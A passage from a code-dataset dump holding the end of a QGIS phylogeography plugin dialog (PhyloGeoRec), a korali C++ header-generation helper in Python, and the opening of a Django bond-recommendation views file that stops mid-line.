str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = build_kml_branch(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_treenodes(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(treenodes_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n\n def generateGeophylogeny_TreeNetworks(self, treenetworks_filename=None):\n kml = \"\"\n if not treenetworks_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n treenetworks_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Tree Networks Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not treenetworks_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny Tree Networks\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = build_kml_leaf(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_treenetworks(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(treenetworks_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n\n def generateGeophylogeny_RootPoint(self, treenetworks_filename=None):\n kml = \"\"\n if not treenetworks_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n treenetworks_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Root Point Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not treenetworks_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny Tree Networks\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = build_kml_rootpoint(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_rootpoint(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(treenetworks_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n#Generate Geophylogeny Node and Branch Section End\n\n#Generate Geophylogeny Construct End\n\n#QGIS2threejs Section\n def settings(self, clean=False):\n # save settings of current panel\n item = self.ui.treeWidget.currentItem()\n if item and self.currentPage:\n self.saveProperties(item, self.currentPage)\n\n # plugin version\n self._settings[\"PluginVersion\"] = plugin_version\n\n # template and output html file path\n self._settings[\"Template\"] = self.ui.comboBox_Template.currentText()\n self._settings[\"OutputFilename\"] = self.ui.lineEdit_OutputFilename.text()\n\n if not clean:\n return self._settings\n\n # clean up settings - remove layers that don't exist in the layer registry\n registry = QgsMapLayerRegistry.instance()\n for itemId in [ObjectTreeItem.ITEM_OPTDEM, ObjectTreeItem.ITEM_POINT, ObjectTreeItem.ITEM_LINE, ObjectTreeItem.ITEM_POLYGON]:\n parent = self._settings.get(itemId, {})\n for layerId in parent.keys():\n if registry.mapLayer(layerId) is None:\n del parent[layerId]\n\n return self._settings\n\n def setSettings(self, settings):\n self._settings = settings\n\n # template and output html file path\n templateName = settings.get(\"Template\")\n if templateName:\n cbox = self.ui.comboBox_Template\n index = cbox.findText(templateName)\n if index != -1:\n cbox.setCurrentIndex(index)\n\n filename = settings.get(\"OutputFilename\")\n if filename:\n self.ui.lineEdit_OutputFilename.setText(filename)\n\n # update object tree\n self.ui.treeWidget.blockSignals(True)\n self.initObjectTree()\n self.ui.treeWidget.blockSignals(False)\n\n # update tree item visibility\n self.templateType = None\n self.currentTemplateChanged()\n\n def loadSettings(self):\n # file open dialog\n directory = QgsProject.instance().homePath()\n if not directory:\n directory = os.path.split(self.ui.lineEdit_OutputFilename.text())[0]\n if not directory:\n directory = QDir.homePath()\n filterString = \"Settings files (*.qto3settings);;All files (*.*)\"\n filename = QFileDialog.getOpenFileName(self, \"Load Export Settings\", directory, filterString)\n if not filename:\n return\n\n # load settings from file (.qto3settings)\n import json\n with open(filename) as f:\n settings = json.load(f)\n\n self.setSettings(settings)\n\n def saveSettings(self, filename=None):\n if not filename:\n # file save dialog\n directory = QgsProject.instance().homePath()\n if not directory:\n directory = os.path.split(self.ui.lineEdit_OutputFilename.text())[0]\n if not directory:\n directory = QDir.homePath()\n filename = QFileDialog.getSaveFileName(self, \"Save Export Settings\", directory, \"Settings files (*.qto3settings)\")\n if not filename:\n return\n\n # append .qto3settings extension if filename doesn't have\n if os.path.splitext(filename)[1].lower() != \".qto3settings\":\n filename += \".qto3settings\"\n\n # save settings to file (.qto3settings)\n import codecs\n import json\n with codecs.open(filename, \"w\", \"UTF-8\") as f:\n json.dump(self.settings(True), f, ensure_ascii=False, indent=2, sort_keys=True)\n\n logMessage(u\"Settings saved: {0}\".format(filename))\n\n def clearSettings(self):\n if QMessageBox.question(self, \"PhyloGeoRec\", \"Are you sure to clear all export settings?\", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Ok:\n self.setSettings({})\n\n def pluginSettings(self):\n from settingsdialog import SettingsDialog\n dialog = SettingsDialog(self)\n if dialog.exec_():\n self.pluginManager.reloadPlugins()\n self.pages[ppages.PAGE_DEM].initLayerComboBox()\n\n def showMessageBar(self, text, level=QgsMessageBar.INFO):\n # from src/gui/qgsmessagebaritem.cpp\n if level == QgsMessageBar.CRITICAL:\n msgIcon = \"/mIconCritical.png\"\n bgColor = \"#d65253\"\n elif level == QgsMessageBar.WARNING:\n msgIcon = \"/mIconWarn.png\"\n bgColor = \"#ffc800\"\n else:\n msgIcon = \"/mIconInfo.png\"\n bgColor = \"#e7f5fe\"\n stylesheet = \"QLabel {{ background-color:{0}; }}\".format(bgColor)\n\n label = self.ui.label_MessageIcon\n label.setPixmap(QgsApplication.getThemeIcon(msgIcon).pixmap(24))\n label.setStyleSheet(stylesheet)\n label.setVisible(True)\n\n label = self.ui.label_Status\n label.setText(text)\n label.setStyleSheet(stylesheet)\n\n def clearMessageBar(self):\n self.ui.label_MessageIcon.setVisible(False)\n self.ui.label_Status.setText(\"\")\n self.ui.label_Status.setStyleSheet(\"QLabel { background-color: rgba(0, 0, 0, 0); }\")\n\n def initTemplateList(self):\n cbox = self.ui.comboBox_Template\n cbox.clear()\n templateDir = QDir(tools.templateDir())\n for i, entry in enumerate(templateDir.entryList([\"*.html\", \"*.htm\"])):\n cbox.addItem(entry)\n\n config = tools.getTemplateConfig(entry)\n # get template type\n templateType = config.get(\"type\", \"plain\")\n cbox.setItemData(i, templateType, Qt.UserRole)\n\n # set tool tip text\n desc = config.get(\"description\", \"\")\n if desc:\n cbox.setItemData(i, desc, Qt.ToolTipRole)\n\n # select the template of the settings\n templatePath = self._settings.get(\"Template\")\n\n # if no template setting, select the last used template\n if not templatePath:\n #TODO: Fix UNICODE Bug, for now use UTF-8 instead\n templatePath = QSettings().value(\"/PhyloGeoRec/lastTemplate\", def_vals.template, type=unicode)\n #templatePath = QSettings().value(\"/PhyloGeoRec/lastTemplate\", def_vals.template, type=\"UTF-8\")\n\n if templatePath:\n index = cbox.findText(templatePath)\n if index != -1:\n cbox.setCurrentIndex(index)\n return index\n return -1\n\n def initObjectTree(self):\n tree = self.ui.treeWidget\n tree.clear()\n\n # add vector and raster layers into tree widget\n topItems = {}\n for id, name in zip(ObjectTreeItem.topItemIds, ObjectTreeItem.topItemNames):\n item = QTreeWidgetItem(tree, [name])\n item.setData(0, Qt.UserRole, id)\n topItems[id] = item\n\n optDEMChecked = False\n for layer in self.iface.legendInterface().layers():\n parentId = ObjectTreeItem.parentIdByLayer(layer)\n if parentId is None:\n continue\n\n item = QTreeWidgetItem(topItems[parentId], [layer.name()])\n isVisible = self._settings.get(parentId, {}).get(layer.id(), {}).get(\"visible\", False) #self.iface.legendInterface().isLayerVisible(layer)\n check_state = Qt.Checked if isVisible else Qt.Unchecked\n item.setData(0, Qt.CheckStateRole, check_state)\n item.setData(0, Qt.UserRole, layer.id())\n if parentId == ObjectTreeItem.ITEM_OPTDEM and isVisible:\n optDEMChecked = True\n\n for id, item in topItems.iteritems():\n if id != ObjectTreeItem.ITEM_OPTDEM or optDEMChecked:\n tree.expandItem(item)\n\n # disable additional DEM item which is selected as main DEM\n layerId = self._settings.get(ObjectTreeItem.ITEM_DEM, {}).get(\"comboBox_DEMLayer\")\n if layerId:\n self.primaryDEMChanged(layerId)\n\n def saveProperties(self, item, page):\n properties = page.properties()\n parent = item.parent()\n if parent is None:\n # top level item\n self._settings[item.data(0, Qt.UserRole)] = properties\n else:\n # layer item\n parentId = parent.data(0, Qt.UserRole)\n if parentId not in self._settings:\n self._settings[parentId] = {}\n self._settings[parentId][item.data(0, Qt.UserRole)] = properties\n\n def setCurrentTreeItemByData(self, data):\n it = QTreeWidgetItemIterator(self.ui.treeWidget)\n while it.value():\n if it.value().data(0, Qt.UserRole) == data:\n self.ui.treeWidget.setCurrentItem(it.value())\n return True\n it += 1\n return False\n\n def currentTemplateChanged(self, index=None):\n cbox = self.ui.comboBox_Template\n templateType = cbox.itemData(cbox.currentIndex(), Qt.UserRole)\n if templateType == self.templateType:\n return\n\n # hide items unsupported by template\n tree = self.ui.treeWidget\n for i, id in enumerate(ObjectTreeItem.topItemIds):\n hidden = (templateType == \"sphere\" and id != ObjectTreeItem.ITEM_CONTROLS)\n tree.topLevelItem(i).setHidden(hidden)\n\n # set current tree item\n if templateType == \"sphere\":\n tree.setCurrentItem(tree.topLevelItem(ObjectTreeItem.topItemIndex(ObjectTreeItem.ITEM_CONTROLS)))\n elif self.lastTreeItemData is None or not self.setCurrentTreeItemByData(self.lastTreeItemData): # restore selection\n tree.setCurrentItem(tree.topLevelItem(ObjectTreeItem.topItemIndex(ObjectTreeItem.ITEM_DEM))) # default selection for plain is DEM\n\n # display messages\n self.clearMessageBar()\n if templateType != \"sphere\":\n # show message if crs unit is degrees\n mapSettings = self.iface.mapCanvas().mapSettings() if QGis.QGIS_VERSION_INT >= 20300 else self.iface.mapCanvas().mapRenderer()\n if mapSettings.destinationCrs().mapUnits() in [QGis.Degrees]:\n self.showMessageBar(\"The unit of current CRS is degrees, so terrain may not appear well.\", QgsMessageBar.WARNING)\n\n self.templateType = templateType\n\n def currentObjectChanged(self, currentItem, previousItem):\n # save properties of previous item\n if previousItem and self.currentPage:\n self.saveProperties(previousItem, self.currentPage)\n\n self.currentItem = currentItem\n self.currentPage = None\n\n # hide text browser and all pages\n self.ui.textBrowser.hide()\n for page in self.pages.itervalues():\n page.hide()\n\n parent = currentItem.parent()\n if parent is None:\n topItemIndex = currentItem.data(0, Qt.UserRole)\n pageType = self.topItemPages.get(topItemIndex, ppages.PAGE_NONE)\n page = self.pages.get(pageType, None)\n if page is None:\n self.showDescription(topItemIndex)\n return\n\n page.setup(self._settings.get(topItemIndex))\n page.show()\n\n else:\n parentId = parent.data(0, Qt.UserRole)\n layerId = currentItem.data(0, Qt.UserRole)\n layer = QgsMapLayerRegistry.instance().mapLayer(unicode(layerId))\n if layer is None:\n return\n\n layerType = layer.type()\n if layerType == QgsMapLayer.RasterLayer:\n page = self.pages[ppages.PAGE_DEM]\n page.setup(self._settings.get(parentId, {}).get(layerId, None), layer, False)\n elif layerType == QgsMapLayer.VectorLayer:\n page = self.pages[ppages.PAGE_VECTOR]\n page.setup(self._settings.get(parentId, {}).get(layerId, None), layer)\n else:\n return\n\n page.show()\n\n self.currentPage = page\n\n def objectItemChanged(self, item, column):\n parent = item.parent()\n if parent is None:\n return\n\n # checkbox of optional layer checked/unchecked\n if item == self.currentItem:\n if self.currentPage:\n # update enablement of property widgets\n self.currentPage.itemChanged(item)\n else:\n # select changed item\n self.ui.treeWidget.setCurrentItem(item)\n\n # set visible property\n #visible = item.data(0, Qt.CheckStateRole) == Qt.Checked\n #parentId = parent.data(0, Qt.UserRole)\n #layerId = item.data(0, Qt.UserRole)\n #self._settings.get(parentId, {}).get(layerId, {})[\"visible\"] = visible\n\n def primaryDEMChanged(self, layerId):\n tree = self.ui.treeWidget\n parent = tree.topLevelItem(ObjectTreeItem.topItemIndex(ObjectTreeItem.ITEM_OPTDEM))\n tree.blockSignals(True)\n for i in range(parent.childCount()):\n item = parent.child(i)\n isPrimary = item.data(0, Qt.UserRole) == layerId\n item.setDisabled(isPrimary)\n tree.blockSignals(False)\n\n def showDescription(self, topItemIndex):\n fragment = {ObjectTreeItem.ITEM_OPTDEM: \"additional-dem\",\n ObjectTreeItem.ITEM_POINT: \"point\",\n ObjectTreeItem.ITEM_LINE: \"line\",\n ObjectTreeItem.ITEM_POLYGON: \"polygon\"}.get(topItemIndex)\n\n url = \"http://qgis2threejs.readthedocs.org/en/docs-release/ExportSettings.html\"\n if fragment:\n url += \"#\" + fragment\n\n html = 'Online Help about this item'.format(url)\n self.ui.textBrowser.setHtml(html)\n self.ui.textBrowser.show()\n\n def numericFields(self, layer):\n # get attributes of a sample feature and create numeric field name list\n numeric_fields = []\n f = QgsFeature()\n layer.getFeatures().nextFeature(f)\n for field in f.fields():\n isNumeric = False\n try:\n float(f.attribute(field.name()))\n isNumeric = True\n except ValueError:\n pass\n if isNumeric:\n numeric_fields.append(field.name())\n return numeric_fields\n\n def mapTo3d(self):\n canvas = self.iface.mapCanvas()\n mapSettings = canvas.mapSettings() if QGis.QGIS_VERSION_INT >= 20300 else canvas.mapRenderer()\n\n world = self._settings.get(ObjectTreeItem.ITEM_WORLD, {})\n bs = float(world.get(\"lineEdit_BaseSize\", def_vals.baseSize))\n ve = float(world.get(\"lineEdit_zFactor\", def_vals.zExaggeration))\n vs = float(world.get(\"lineEdit_zShift\", def_vals.zShift))\n\n return MapTo3D(mapSettings, bs, ve, vs)\n\n def progress(self, percentage=None, statusMsg=None):\n ui = self.ui\n if percentage is not None:\n ui.progressBar.setValue(percentage)\n if percentage == 100:\n ui.progressBar.setVisible(False)\n ui.label_Status.setText(\"\")\n else:\n ui.progressBar.setVisible(True)\n\n if statusMsg is not None:\n ui.label_Status.setText(statusMsg)\n ui.label_Status.repaint()\n QgsApplication.processEvents(QEventLoop.ExcludeUserInputEvents)\n\n def run(self):\n self.endPointSelection()\n\n ui = self.ui\n filename = ui.lineEdit_OutputFilename.text() # \"\"=Temporary file\n if filename and os.path.exists(filename):\n if QMessageBox.question(self, \"PhyloGeoRec\", \"Output file already exists. Overwrite it?\", QMessageBox.Ok | QMessageBox.Cancel) != QMessageBox.Ok:\n return\n\n # export to web (three.js)\n export_settings = ExportSettings(self.pluginManager, self.localBrowsingMode)\n export_settings.loadSettings(self.settings())\n export_settings.setMapCanvas(self.iface.mapCanvas())\n\n err_msg = export_settings.checkValidity()\n if err_msg is not None:\n QMessageBox.warning(self, \"PhyloGeoRec\", err_msg or \"Invalid settings\")\n return\n\n ui.pushButton_Run.setEnabled(False)\n ui.toolButton_Settings.setVisible(False)\n self.clearMessageBar()\n self.progress(0)\n\n if export_settings.exportMode == ExportSettings.PLAIN_MULTI_RES:\n # update quads and point on map canvas\n self.createRubberBands(export_settings.baseExtent, export_settings.quadtree())\n\n # export\n ret = exportToThreeJS(export_settings, self.iface.legendInterface(), self.objectTypeManager, self.progress)\n\n self.progress(100)\n ui.pushButton_Run.setEnabled(True)\n\n if not ret:\n ui.toolButton_Settings.setVisible(True)\n return\n\n self.clearRubberBands()\n\n # store last selections\n settings = QSettings()\n settings.setValue(\"/PhyloGeoRec/lastTemplate\", export_settings.templatePath)\n settings.setValue(\"/PhyloGeoRec/lastControls\", export_settings.controls)\n\n # open web browser\n if not tools.openHTMLFile(export_settings.htmlfilename):\n ui.toolButton_Settings.setVisible(True)\n return\n\n # close dialog\n QDialog.accept(self)\n\n def reject(self):\n # save properties of current object\n item = self.ui.treeWidget.currentItem()\n if item and self.currentPage:\n self.saveProperties(item, self.currentPage)\n\n self.endPointSelection()\n self.clearRubberBands()\n QDialog.reject(self)\n\n def help(self):\n url = \"http://qgis2threejs.readthedocs.org/\"\n\n import webbrowser\n webbrowser.open(url, new=2) # new=2: new tab if possible\n\n def startPointSelection(self):\n canvas = self.iface.mapCanvas()\n if self.previousMapTool != self.mapTool:\n self.previousMapTool = canvas.mapTool()\n canvas.setMapTool(self.mapTool)\n self.pages[ppages.PAGE_DEM].toolButton_PointTool.setVisible(False)\n\n def endPointSelection(self):\n self.mapTool.reset()\n if self.previousMapTool is not None:\n self.iface.mapCanvas().setMapTool(self.previousMapTool)\n\n def mapToolSet(self, mapTool):\n return\n #TODO: unstable\n if mapTool != self.mapTool and self.currentPage is not None:\n if self.currentPage.pageType == ppages.PAGE_DEM and self.currentPage.isPrimary:\n self.currentPage.toolButton_PointTool.setVisible(True)\n\n def createRubberBands(self, baseExtent, quadtree):\n self.clearRubberBands()\n # create quads with rubber band\n self.rb_quads = QgsRubberBand(self.iface.mapCanvas(), QGis.Line)\n self.rb_quads.setColor(Qt.blue)\n self.rb_quads.setWidth(1)\n\n quads = quadtree.quads()\n for quad in quads:\n geom = baseExtent.subrectangle(quad.rect).geometry()\n self.rb_quads.addGeometry(geom, None)\n self.log(\"Quad count: %d\" % len(quads))\n\n if not quadtree.focusRect:\n return\n\n # create a point with rubber band\n if quadtree.focusRect.width() == 0 or quadtree.focusRect.height() == 0:\n npt = quadtree.focusRect.center()\n self.rb_point = QgsRubberBand(self.iface.mapCanvas(), QGis.Point)\n self.rb_point.setColor(Qt.red)\n self.rb_point.addPoint(baseExtent.point(npt))\n\n def clearRubberBands(self):\n # clear quads and point\n if self.rb_quads:\n self.iface.mapCanvas().scene().removeItem(self.rb_quads)\n self.rb_quads = None\n if self.rb_point:\n self.iface.mapCanvas().scene().removeItem(self.rb_point)\n self.rb_point = None\n\n def browseClicked(self):\n directory = os.path.split(self.ui.lineEdit_OutputFilename.text())[0]\n if not directory:\n directory = QDir.homePath()\n filename = QFileDialog.getSaveFileName(self, self.tr(\"Output filename\"), directory, \"HTML file (*.html *.htm)\", options=QFileDialog.DontConfirmOverwrite)\n if not filename:\n return\n\n # append .html extension if filename doesn't have either .html or .htm\n if filename[-5:].lower() != \".html\" and filename[-4:].lower() != \".htm\":\n filename += \".html\"\n\n self.ui.lineEdit_OutputFilename.setText(filename)\n\n def log(self, msg):\n if debug_mode:\n qDebug(msg)\n\n#QGIS2threejs Section End\n\n#QGIS2threejs Class\n\nclass PointMapTool(QgsMapToolEmitPoint):\n\n def __init__(self, canvas):\n self.canvas = canvas\n QgsMapToolEmitPoint.__init__(self, self.canvas)\n self.point = None\n\n def canvasPressEvent(self, e):\n self.point = self.toMapCoordinates(e.pos())\n self.emit(SIGNAL(\"pointSelected()\"))\n\n\n#Changed By Maulana Malik Nashrulloh/3-6-16\nclass RectangleMapTool(QgsMapToolEmitPoint):\n\n def __init__(self, canvas):\n QgsMapToolEmitPoint.__init__(self, canvas)\n\n self.canvas = canvas\n self.rubberBand = QgsRubberBand(canvas, QGis.Polygon)\n self.rubberBand.setColor(QColor(255, 0, 0, 180))\n self.rubberBand.setWidth(1)\n self.reset()\n\n def reset(self):\n self.startPoint = self.endPoint = None\n self.isDrawing = False\n self.rubberBand.reset(QGis.Polygon)\n\n def canvasPressEvent(self, e):\n self.startPoint = self.toMapCoordinates(e.pos())\n self.endPoint = self.startPoint\n\n mapSettings = self.canvas.mapSettings() if QGis.QGIS_VERSION_INT >= 20300 else self.canvas.mapRenderer()\n # mapSettings = self.canvas.mapSettings() if QGis.QGIS_VERSION_INT >= 20300 else self.canvas.mapRenderer()\n self.mupp = mapSettings.mapUnitsPerPixel()\n self.rotation = mapSettings.rotation() if QGis.QGIS_VERSION_INT >= 20700 else 0\n\n self.isDrawing = True\n self.showRect(self.startPoint, self.endPoint)\n\n def canvasReleaseEvent(self, e):\n self.isDrawing = False\n self.emit(SIGNAL(\"rectangleCreated()\"))\n\n def canvasMoveEvent(self, e):\n if not self.isDrawing:\n return\n self.endPoint = self.toMapCoordinates(e.pos())\n self.showRect(self.startPoint, self.endPoint)\n\n def showRect(self, startPoint, endPoint):\n self.rubberBand.reset(QGis.Polygon)\n if startPoint.x() == endPoint.x() and startPoint.y() == endPoint.y():\n return\n\n for i, pt in enumerate(self._rect(startPoint, endPoint).vertices()):\n self.rubberBand.addPoint(pt, bool(i == 3))\n self.rubberBand.show()\n\n def _rect(self, startPoint, endPoint):\n if startPoint is None or endPoint is None:\n return None\n\n p0 = self.toCanvasCoordinates(startPoint)\n p1 = self.toCanvasCoordinates(endPoint)\n canvas_rect = QgsRectangle(QgsPoint(p0.x(), p0.y()), QgsPoint(p1.x(), p1.y()))\n center = QgsPoint((startPoint.x() + endPoint.x()) / 2, (startPoint.y() + endPoint.y()) / 2)\n return RotatedRect(center, self.mupp * canvas_rect.width(), self.mupp * canvas_rect.height()).rotate(self.rotation, center)\n\n def rectangle(self):\n return self._rect(self.startPoint, self.endPoint)\n\n def setRectangle(self, rect):\n if rect == self._rect(self.startPoint, self.endPoint):\n return False\n\n v = rect.vertices()\n self.startPoint = v[3]\n self.endPoint = v[1]\n self.showRect(self.startPoint, self.endPoint)\n return True\n\n#QGIS2threejs Class End\n\n\n\n","repo_name":"mmnashrullah/PHYLOGEOrec-alpha","sub_path":"PhyloGeoRec/phylogeorecdialog.py","file_name":"phylogeorecdialog.py","file_ext":"py","file_size_in_byte":42937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"72005004794","text":"import sys\nfrom . import variables as vr\nfrom . import auxiliar as aux\nimport re\n\n\ndef checkHeaderTemplateString( moduleConfig, templateFilePath, moduleTemplate ):\n \"\"\"These keywords shouls appear only once\"\"\"\n\n substrings = ['__className__',\n '__parentClassName__']\n\n aux.checkNamespaceKeys(moduleConfig, templateFilePath, moduleTemplate)\n\ndef startNamespace(moduleConfig):\n \"\"\"String for the start the header namespace\"\"\"\n string = [ 'namespace ' + s + '\\n{\\n' for s in moduleConfig['Namespace'] ]\n string = ''.join(string)\n return string\n\ndef endNamespace(moduleConfig):\n \"\"\"String for the end the header namespace\"\"\"\n string = [ '} //' + s + '\\n' for s in reversed(moduleConfig['Namespace']) ]\n string = ''.join(string)\n return string\n\n\ndef createHeaderDeclarations(moduleConfig):\n \"\"\"String for variable declarations\"\"\"\n\n string = ' '\n if 'Configuration Settings' in moduleConfig:\n for v in moduleConfig[\"Configuration Settings\"]:\n string += '/**\\n '\n string += '* @brief ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' ' + vr.getVariableType(v) + ' ' + vr.getCXXVariableName(v[\"Name\"]) + ';\\n '\n\n if 'Internal Settings' in moduleConfig:\n for v in moduleConfig[\"Internal Settings\"]:\n string += '/**\\n '\n string += '* @brief [Internal Use] ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' ' + vr.getVariableType(v) + ' ' + vr.getCXXVariableName(v[\"Name\"]) + ';\\n '\n\n if 'Termination Criteria' in moduleConfig:\n for v in moduleConfig[\"Termination Criteria\"]:\n string += '/**\\n '\n string += '* @brief [Termination Criteria] ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' ' + vr.getVariableType(v) + ' ' + vr.getCXXVariableName(v[\"Name\"]) + ';\\n '\n\n if 'Conditional Variables' in moduleConfig:\n for v in moduleConfig[\"Conditional Variables\"]:\n string += '/**\\n '\n string += '* @brief [Conditional Variable Value] ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' double ' + vr.getCXXVariableName(v[\"Name\"]) + ';\\n '\n\n string += '/**\\n '\n string += '* @brief [Conditional Variable Reference] ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' std::string ' + vr.getCXXVariableName(v[\"Name\"]) + 'Conditional;\\n '\n\n return string\n\n\ndef createrClassDoxygenString( moduleConfig ):\n \"\"\"Creates the doxygen string for the class documentation\"\"\"\n string = '/**\\n'\n string += '* @brief Class declaration for module: ' + moduleConfig['Class Name'] + '.\\n'\n string += '*/\\n'\n return string\n\n\ndef createHeaderDoxygenString( moduleConfig ):\n \"\"\"Creates the doxygen string that goes to the top of the header file\"\"\"\n\n string = '/** \\\\namespace ' + moduleConfig['Namespace'][-1] + '\\n'\n string += '* @brief Namespace declaration for modules of type: ' + moduleConfig['Namespace'][-1] + '.\\n'\n string += '*/\\n\\n'\n\n string += '/** \\\\file\\n'\n string += '* @brief Header file for module: ' + moduleConfig[\"Class Name\"] + '.\\n'\n string += '*/\\n\\n'\n\n string += '/** \\\\dir ' + moduleConfig[\"Relative Path\"] + '\\n'\n string += '* @brief Contains code, documentation, and scripts for module: ' + moduleConfig[\"Class Name\"] + '.\\n'\n string += '*/\\n\\n'\n\n return string\n\n\ndef createOverrideFunctionString(moduleConfig):\n \"\"\"Creates the sting of overridden function declarations\"\"\"\n\n string = ' '\n if 'Termination Criteria' in moduleConfig:\n string += '/**\\n '\n string += '* @brief Determines whether the module can trigger termination of an experiment run.\\n '\n string += '* @return True, if it should trigger termination; false, otherwise.\\n '\n string += '*/\\n '\n string += 'bool checkTermination() override;\\n '\n\n string += '/**\\n '\n string += '* @brief Obtains the entire current state and configuration of the module.\\n '\n string += '* @param js JSON object onto which to save the serialized state of the module.\\n '\n string += '*/\\n '\n string += 'void getConfiguration(knlohmann::json& js) override;\\n '\n\n string += '/**\\n '\n string += '* @brief Sets the entire state and configuration of the module, given a JSON object.\\n '\n string += '* @param js JSON object from which to deserialize the state of the module.\\n '\n string += '*/\\n '\n string += 'void setConfiguration(knlohmann::json& js) override;\\n '\n\n string += '/**\\n '\n string += '* @brief Applies the module\\'s default configuration upon its creation.\\n '\n string += '* @param js JSON object containing user configuration. The defaults will not override any currently defined settings.\\n '\n string += '*/\\n '\n string += 'void applyModuleDefaults(knlohmann::json& js) override;\\n '\n\n string += '/**\\n '\n string += '* @brief Applies the module\\'s default variable configuration to each variable in the Experiment upon creation.\\n '\n string += '*/\\n '\n string += 'void applyVariableDefaults() override;\\n '\n\n if 'Available Operations' in moduleConfig:\n string += '/**\\n '\n string += '* @brief Runs the operation specified on the given sample. It checks recursively whether the function was found by the current module or its parents.\\n '\n string += \"* @param sample Sample to operate on. Should contain in the 'Operation' field an operation accepted by this module or its parents.\\n \"\n string += '* @param operation Should specify an operation type accepted by this module or its parents.\\n '\n string += '* @return True, if operation found and executed; false, otherwise.\\n '\n string += '*/\\n '\n string += 'bool runOperation(std::string operation, korali::Sample& sample) override;\\n '\n\n if 'Conditional Variables' in moduleConfig:\n string += '/**\\n '\n string += '* @brief Retrieves the pointer of a conditional value of a distribution property.\\n '\n string += '* @param property Name of the property to find.\\n '\n string += '* @return The pointer to the property..\\n '\n string += '*/\\n '\n string += 'double* getPropertyPointer(const std::string& property) override;\\n '\n\n return string","repo_name":"cselab/korali","sub_path":"tools/build/codeBuilders/header_builders.py","file_name":"header_builders.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"95"} +{"seq_id":"16700574279","text":"import os\nimport json\nfrom functools import lru_cache\nfrom urllib.parse import urlencode\n\nimport pandas as pd\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom BondRecommender.models import Securities, vanguard_merge\nfrom BondRecommender.data_loader import get_single_day_data, get_multi_day_data\nfrom BondRecommender.recommendation_models import similar_bonds_pipeline\nfrom BondRecommender.prediction_models import predict_single_rc\nfrom BondRecommender.bpr_model import BPRModel, ModelHelper\n\n@lru_cache(maxsize=16)\ndef get_bpr_model_helper():\n num_factors = 32\n \n isin_to_index_mapping_file = os.path.join(os.path.dirname(__file__), 'isin_to_index2.json')\n isin_to_index_mapping = json.load(open(isin_to_index_mapping_file))\n num_bonds = len(isin_to_index_mapping)\n \n model = BPRModel(num_bonds, num_factors)\n model_helper = ModelHelper(model, isin_to_index_mapping, get_single_day_data())\n \n weights_file = os.path.join(os.path.dirname(__file__), 'bpr_v2.pt')\n model_helper.load(weights_file)\n\n return model_helper \n\n\n# Create your views here.\ndef home(request):\n context = dict()\n return render(request, 'home.html', context)\n\ndef results(request):\n\n context = dict()\n sec_id = str(request.GET['sec_id'])\n context['sec_id'] = sec_id\n context['sec_id_error'] = 0\n numofdays = int(request.GET.get('num_of_days', 30))\n numofrecomm = int(request.GET.get('num_of_recommendation', 10))\n cohort_filtering = str(request.GET.get('cohort_filtering', 'Yes'))\n ytm_upper = str(request.GET.get('ytm_upper', ''))\n ytm_lower = str(request.GET.get('ytm_lower', ''))\n oad_upper = str(request.GET.get('oad_upper', ''))\n oad_lower = str(request.GET.get('oad_lower', ''))\n\n try:\n ## COLUMNS WHOSE VALUES MUST BE THE SAME IN ORDER TO BE CONSIDERED SIMILAR\n if cohort_filtering == \"Yes\":\n cohort_attributes = ['BCLASS3', 